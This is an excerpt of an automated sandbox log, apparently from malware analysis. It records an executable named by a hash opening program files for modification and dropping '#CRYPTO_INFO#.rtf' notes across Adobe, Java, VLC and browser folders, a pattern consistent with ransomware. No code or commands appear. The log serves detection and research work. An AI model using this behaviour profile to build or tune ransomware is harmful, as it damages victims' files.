8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496926556.profile.gz 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-options-api.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ko.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\check-mark-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\rename.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightRegular.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close_h.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-fr_fr.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\dropins\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ir.idl 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ar.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\db\lib\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-down_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_it.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\next-arrow-disabled.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\illustrations.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaSansRegular.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\net.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\psfontj2d.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon_hover.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\home-view.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-focus.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\custom_poster.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_selected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\docs.crx 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pt_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management\management.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_selected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\line_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\AddressBook.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reminders_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_partialselected-default_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_patterns_header.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_fillandsign_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_es.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\core.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_nb_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-templates.jar 